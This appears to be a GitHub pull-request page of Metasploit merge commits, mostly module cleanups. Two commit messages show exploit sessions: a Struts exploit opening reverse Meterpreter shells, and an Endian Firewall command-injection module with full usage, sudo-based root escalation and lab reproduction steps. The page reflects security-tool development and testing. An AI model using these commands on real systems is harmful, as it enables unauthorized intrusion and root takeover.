Use opts.usage instead of a Table #1

Merged
merged 1 commit into thelightcosine:findpids from jlee-r7/dmaloney-r7-findpids on Oct 22, 2012


jlee-r7 commented Oct 22, 2012

No description provided.

thelightcosine pushed a commit that referenced this pull request Oct 22, 2012

Merge pull request #1 from jlee-r7/dmaloney-r7-findpids
Use opts.usage instead of a Table

@thelightcosine thelightcosine merged commit 4f9385a into thelightcosine:findpids Oct 22, 2012

thelightcosine pushed a commit that referenced this pull request Oct 30, 2012

Merge pull request #1 from todb-r7/metasploit-pcaplog
Loop management, timeouts, and verbosity by todb is full of win

thelightcosine pushed a commit that referenced this pull request Dec 7, 2012

Merge pull request #1 from jvazquez-r7/psexec_command
Psexec command Cleanup. Works for me, good to go!

thelightcosine pushed a commit that referenced this pull request Jan 28, 2013

Merge pull request #1 from jvazquez-r7/sonicwall_test
assuring stdapi loads on meterpreter

thelightcosine pushed a commit that referenced this pull request Feb 18, 2013

Merge pull request #1 from jvazquez-r7/persistence_vbs
using always a vbs file to drop exe

thelightcosine pushed a commit that referenced this pull request Feb 18, 2013

Merge pull request #1 from jvazquez-r7/devise_clean
This is all just formatting, ref additions, etc.  Nothing substantial so I'll just merge and test as I'm trying to figure out what's up with failing on @rvazquez-r7's app.

thelightcosine pushed a commit that referenced this pull request Mar 25, 2013

Merge pull request #1 from todb-r7/feature/loot-manipulation
Make it clear that you're deleting all loot

thelightcosine pushed a commit that referenced this pull request Apr 16, 2013

Merge pull request #1 from todb-r7/exe_only_patch
Exe only patch : avoid merge conflict and don't use win32pe_only everywhere by default.

thelightcosine pushed a commit that referenced this pull request Apr 16, 2013

Merge pull request #1 from jvazquez-r7/nagios_nrpe_work
cleanup for nagios_nrpe_arguments

thelightcosine pushed a commit that referenced this pull request Apr 16, 2013

Merge pull request #1 from jvazquez-r7/injector_docx_post
testing completed. I see no issues with the proposed changes, tempfiles and quickfile work fine.

thelightcosine pushed a commit that referenced this pull request May 24, 2013

Merge pull request #1 from wchen-r7/pr1856_target_fix
Fix #1856 - Target selection and swf path

thelightcosine pushed a commit that referenced this pull request Jun 1, 2013

Fix issue with JAVA meterpreter failing to work.
Was down to the chunk length not being set correctly.
Still need to test against windows.

```
msf exploit(struts_include_params) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Universal
   1   Linux Universal
   2   Java Universal

msf exploit(struts_include_params) > set target 1
target => 1
msf exploit(struts_include_params) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.0.1
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.1:38512) at 2013-05-30 10:37:54 +0100
[+] Deleted /tmp/57mN5N

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Linux localhost.localdomain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.0.1 - Meterpreter session 5 closed.  Reason: User exit
msf exploit(struts_include_params) > set target 2
target => 2
msf exploit(struts_include_params) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending stage (30246 bytes) to 192.168.0.1
[*] Meterpreter session 6 opened (192.168.0.2:4444 -> 192.168.0.1:38513) at 2013-05-30 10:38:27 +0100
[!] This exploit may require manual cleanup of: z4kv.jar

meterpreter > sysinfo
Computer    : localhost.localdomain
OS          : Linux 2.6.32-358.2.1.el6.x86_64 (amd64)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```

thelightcosine pushed a commit that referenced this pull request Jun 27, 2013

Merge pull request #1 from jvazquez-r7/rfcode_work
Final cleanup for rfcode_reader_enum

thelightcosine pushed a commit that referenced this pull request Jul 18, 2013

Merge pull request #1 from jvazquez-r7/instantcms
Improve and clean instantcms_exec

thelightcosine pushed a commit that referenced this pull request Aug 12, 2013

Merge pull request #1 from todb-r7/bug/pr1736-fix-db-import
Handle single quotes for OpenVAS import

thelightcosine pushed a commit that referenced this pull request Aug 24, 2013

Merge pull request #1 from CharlieEriksen/squash-rce
Adding Squash RCE exploit module

thelightcosine pushed a commit that referenced this pull request Sep 9, 2013

Merge pull request #1 from Meatballs1/pr/2270
Refactor and fixes

Added all of Meatball's awesome fixes.

thelightcosine pushed a commit that referenced this pull request Oct 8, 2013

Merge pull request #1 from jvennix-r7/locked_pref_panel_dry
Clean up timeout logic and update description

thelightcosine pushed a commit that referenced this pull request Oct 8, 2013

Merge pull request #1 from todb-r7/land-2414
Disambiguate tape_engine_8A as tape_engine_0x8a

thelightcosine pushed a commit that referenced this pull request Dec 30, 2013

Merge pull request #1 from jvazquez-r7/land_2711
Clean php_wordpress_optimizepress

thelightcosine pushed a commit that referenced this pull request Dec 30, 2013

Merge pull request #1 from wchen-r7/poison_ivy_ports_check
Add an input check for datastore option PORTS

thelightcosine pushed a commit that referenced this pull request Feb 21, 2014

Merge pull request #1 from tabassassin/retab/pr/2307
Retab/pr/2307 landed as requested.

thelightcosine pushed a commit that referenced this pull request Feb 21, 2014

Merge pull request #1 from jvazquez-r7/review-2801
Review IBM Lotus Sametime modules

thelightcosine pushed a commit that referenced this pull request Apr 11, 2014

Merge pull request #1 from Meatballs1/pr2107
Refactor to common post module

thelightcosine pushed a commit that referenced this pull request Nov 10, 2014

Merge pull request #1 from jhart-r7/landing-4003-jhart
Cleanup.  Sanity check in setup.  vprint

thelightcosine pushed a commit that referenced this pull request Nov 10, 2014

Merge pull request #1 from wvu-r7/pr/4063
Add support for jobs -k ranges from @wvu

thelightcosine pushed a commit that referenced this pull request Dec 7, 2014

Merge pull request #1 from jlee-r7/land-2985-pandorafms-sqli
Improvements for PandoraFMS SQLi module

thelightcosine pushed a commit that referenced this pull request Dec 7, 2014

Merge pull request #1 from jhart-r7/landing-4229-jhart
Minor Ruby style and module usability cleanup

thelightcosine pushed a commit that referenced this pull request Dec 7, 2014

Merge pull request #1 from hmoore-r7/smtp_ntlm_domain
Module cleanup, error handling, and reporting

thelightcosine pushed a commit that referenced this pull request Dec 7, 2014

Merge pull request #1 from jhart-r7/landing-4265-jhart
This is a great intermediate approach, thanks @jhart-r7 ! Will verify Pro and msfconsole cases momentarily.

thelightcosine pushed a commit that referenced this pull request Dec 15, 2014

Merge pull request #1 from jvazquez-r7/update_3305
Make Cisco SSL VPN Privilege Escalation landable

thelightcosine pushed a commit that referenced this pull request Dec 15, 2014

Merge pull request #1 from jhart-r7/landing-4328
Minor improvements to actual analyzer ant cookie exploit

thelightcosine pushed a commit that referenced this pull request Dec 15, 2014

Merge pull request #1 from wvu-r7/pr/4361
Merging changes. Thanks for all the help!

thelightcosine pushed a commit that referenced this pull request Jan 30, 2015

Merge pull request #1 from jhart-r7/landing-4503-jhart
Ruby/Metasploit style cleanup of McAfee hashdump module

thelightcosine pushed a commit that referenced this pull request Jan 30, 2015

Merge pull request #1 from jhart-r7/landing-4596-jhart
Improvements to memcached gather module

thelightcosine pushed a commit that referenced this pull request Jan 30, 2015

Merge pull request #1 from jvazquez-r7/rebase_3019
Clean Huawei SOHO router information disclosure

thelightcosine pushed a commit that referenced this pull request Apr 21, 2015

Merge pull request #1 from wvu-r7/pr/5127
Add Privileged to info hash

thelightcosine pushed a commit that referenced this pull request May 12, 2015

Merge pull request #1 from jvazquez-r7/pr_4940
Clean "Updates and new modules for F5 devices"

thelightcosine pushed a commit that referenced this pull request Jun 29, 2015

Merge pull request #1 from wchen-r7/pr5577
Changes for ms15_034_http_sys_memory_dump

thelightcosine pushed a commit that referenced this pull request Aug 5, 2015

Merge pull request #1 from OJ/madmantm-kill-av
Fix killav post module, handle errors, better output

thelightcosine pushed a commit that referenced this pull request Aug 5, 2015

Merge pull request #1 from wchen-r7/pr5788
Properly support detecting target arch and OS

thelightcosine pushed a commit that referenced this pull request Sep 8, 2015

Exploit Module: Endian Firewall Proxy Password Change Command Injection
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5082
(CVE is new as of today, so that page may not display correctly yet)

Targets an OS command injection vulnerability in most released versions
of Endian Firewall. Tested successfully against the following versions:
1.1 RC5
2.0
2.1
2.2
2.5.1
2.5.2

Known to not work against the following versions, due to bugs in the
vulnerable CGI script which also prevent normal use of it:
2.3
2.4.0
3.0.0
3.0.5 beta 1

Requires that at least one username and password be defined in the
local auth store for the Squid proxy component on the system, and that
the attacker know that username and password. Administrative or other
credentials are not required.

Provides OS command execution as the "nobody" account, which (on
all tested versions) has sudo permission to (among other things) run
a script which changes the Linux root account's password.

Example usage / output:

```
msf > use exploit/linux/http/efw_chpasswd_exec
msf exploit(efw_chpasswd_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(efw_chpasswd_exec) > set LHOST 172.16.47.13
LHOST => 172.16.47.13
msf exploit(efw_chpasswd_exec) > set LPORT 443
LPORT => 443
msf exploit(efw_chpasswd_exec) > set RHOST 172.16.47.1
RHOST => 172.16.47.1
msf exploit(efw_chpasswd_exec) > set EFW_USERNAME proxyuser
EFW_USERNAME => proxyuser
msf exploit(efw_chpasswd_exec) > set EFW_PASSWORD password123
EFW_PASSWORD => password123
msf exploit(efw_chpasswd_exec) > exploit

[*] Started reverse handler on 172.16.47.13:443
[*] Command Stager progress -  18.28% done (196/1072 bytes)
[*] Command Stager progress -  36.57% done (392/1072 bytes)
[*] Command Stager progress -  54.85% done (588/1072 bytes)
[*] Command Stager progress -  73.13% done (784/1072 bytes)
[*] Command Stager progress -  91.42% done (980/1072 bytes)
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1138688 bytes) to 172.16.47.1
[*] Meterpreter session 1 opened (172.16.47.13:443 -> 172.16.47.1:36481) at 2015-06-29 10:20:13 -0700
[*] Command Stager progress - 100.47% done (1077/1072 bytes)

meterpreter > getuid
Server username: uid=99, gid=99, euid=99, egid=99, suid=99, sgid=99
meterpreter > sysinfo
Computer     : efw220.vuln.local
OS           : Linux efw220.vuln.local 2.6.22.19-72.endian15 #1 SMP Mon Sep 8 11:49:17 EDT 2008 (i686)
Architecture : i686
Meterpreter  : x86/linux
meterpreter > shell
Process 5768 created.
Channel 1 created.
sh: no job control in this shell
sh-3.00$ whoami
nobody
sh-3.00$ uname -a
Linux efw220.vuln.local 2.6.22.19-72.endian15 #1 SMP Mon Sep 8 11:49:17 EDT 2008 i686 i686 i386 GNU/Linux
sh-3.00$ sudo /usr/local/bin/chrootpasswd
IlikerootaccessandIcannotlie
sh-3.00$ su
Password:IlikerootaccessandIcannotlie

bash: no job control in this shell
bash-3.00# whoami
root
```

Steps to verify module functionality:

Go to http://sourceforge.net/projects/efw/files/Development/

Select version 2, 2.1, 2.2, 2.5.1, or 2.5.2.

Download the ISO file for that version.

Create a VM using the ISO:
  For purposes of VM configuration:
    - Endian is based on the RHEL/CentOS/Fedora Core Linux
      distribution.
    - The ISOs will create a 32-bit x86 system.
    - 512MB of RAM and 4GB of disk space should be more than enough.
    - Be sure to configure the VM with at least two NICs, as the Endian
      setup is difficult (impossible?) to complete with less than two
      network interfaces on the host.
  For the Endian OS-level (Linux) installation:
    - Default options are fine where applicable.
    - Be sure to pick a valid IP for the "Green" network interface, as
      you will use it to access a web GUI to complete the configuration.
    - If prompted to create a root/SSH password and/or web admin
      password, make a note of them. Well, make a note of the web admin
      password - the exploit module will let you change the root
      password later if you want to. This step is dependent on the
      version selected - some will prompt, others default the values to
      "endian".
    - Once the OS-level configuration is complete, access the web
      interface to complete the setup. If you used 172.16.47.1 for the
      "Green" interface, then the URL will be
      https://172.16.47.1:10443/
    - If the web interface is not accessible, reboot the VM (in some
      versions, the web interface does not come up until after the
      first post-installation reboot).
  For the web interface-based configuration:
    - If you were prompted to select an admin password, use it. If not,
      the username/password is admin/endian.
    - Use the second NIC for the "Red" interface. It will not actually
      be used during this walkthrough, so feel free to specify a bogus
      address on a different/nonexistent subnet. Same for its default
      gateway.
    - Once the base configuration is complete, access the main web
      interface URL again.
    - Switch to the Proxy tab.
    - Enable the HTTP proxy.
    - Click Save (or Apply, depending on version).
    - If prompted to apply the settings, do so.
    - Click on the Authentication sub-tab.
    - Make sure the Authentication Method is Local (this should be the
      default).
    - Click the _manage users_ (or _User management_, etc., depending
      on version) button.
    - Click the _Add NCSA user_ (or _Add a user_, etc.) link.
    - Enter "proxyuser" for the username, and "password123" for the
      password, or modify the directions below this point accordingly.
    - Click the _Create user_ button.
    - If prompted to apply the settings, do so.

Module test process:
  From within the MSF console, execute these commands:

    use exploit/linux/http/efw_chpasswd_exec
    set payload linux/x86/meterpreter/reverse_tcp
    set LHOST [YOUR_HOST_IP]
    set LPORT 443
    set RHOST [ENDIAN_GREEN_IP]
    set EFW_USERNAME proxyuser
    set EFW_PASSWORD password123
    exploit

  Once Meterpreter connects, execute the following Meterpreter
  commands:
    getuid
    sysinfo
    shell

  Within the OS shell, execute the following commands:
    whoami
    uname -a
    sudo -l
    sudo /usr/local/bin/chrootpasswd

  It will appear as though the command has hung, but it is actually
  waiting for input. Type "IlikerootaccessandIcannotlie", then press
  enter.

  Execute the following OS command in the shell:
    su

  Type "IlikerootaccessandIcannotlie", then press enter.

  Verify root access (whoami, etc.).

thelightcosine pushed a commit that referenced this pull request Sep 8, 2015

Merge pull request #1 from jlee-r7/newfeature
Add a helper class for doing the geolocation lookup

thelightcosine pushed a commit that referenced this pull request Sep 8, 2015

Merge pull request #1 from jvazquez-r7/review_5722
Code review and cleanup for Busybox PR

thelightcosine pushed a commit that referenced this pull request Oct 5, 2015

Merge pull request #1 from bcook-r7/land-5380-pageantjacker
update pageantjacker to run as part of extapi

thelightcosine pushed a commit that referenced this pull request Nov 3, 2015

Merge pull request #1 from open-security/joomla_contenthistory
rebuild joomla_contenthistory_sqli (cve-2015-7297)

thelightcosine pushed a commit that referenced this pull request Nov 3, 2015

Merge pull request #1 from wvu-r7/pr/6067
Clean up Msf::Sessions::MainframeShell

thelightcosine pushed a commit that referenced this pull request Nov 9, 2015

Merge pull request #1 from jvazquez-r7/review_5720
Fix download of files on linux

thelightcosine pushed a commit that referenced this pull request Nov 30, 2015

Merge pull request #1 from m0t/changes
F5 BIG-IP iCall privilege escalation vulnerability (CVE-2015-3628)

thelightcosine pushed a commit that referenced this pull request Feb 2, 2016

Merge pull request #1 from wchen-r7/update_6226
Update WordPress XMLRPC Massive Bruteforce

thelightcosine pushed a commit that referenced this pull request Jul 5, 2016

Merge pull request #1 from wvu-r7/pr/6954
Fix some silly things in payload land

thelightcosine pushed a commit that referenced this pull request Sep 28, 2016

Merge pull request #1 from gpapakyriakopoulos/gpapakyriakopoulos-prompt-fix

Fixed interactive password prompt issue

thelightcosine pushed a commit that referenced this pull request Oct 11, 2016

Merge pull request #1 from interference-security/tnspoision_checker_bug_fix

Fixed false positive bug in Oracle TNS Listener Checker module

thelightcosine pushed a commit that referenced this pull request Nov 3, 2016

Merge pull request #1 from bwatters-r7/land-7497
Added user logging into the db and humored rubocop

thelightcosine pushed a commit that referenced this pull request Dec 29, 2016

Merge pull request #1 from bwatters-r7/land-7730
Please the rubocop gods (unless they are dumb)

thelightcosine pushed a commit that referenced this pull request Mar 28, 2017

Merge pull request #1 from timwr/pr-7920
fix missing payloads_spec

thelightcosine pushed a commit that referenced this pull request Mar 28, 2017

Merge pull request #1 from wvu-r7/pr/7968
Convert to CmdStager for R7000 exploit

thelightcosine pushed a commit that referenced this pull request Mar 28, 2017

Merge pull request #1 from wvu-r7/pr/8095
Update freesshd_authbypass to use CmdStager fully

thelightcosine pushed a commit that referenced this pull request May 18, 2017

Merge pull request #1 from wchen-r7/pr8394_fix
Pass msftidy for moxa_credentials_recovery.rb
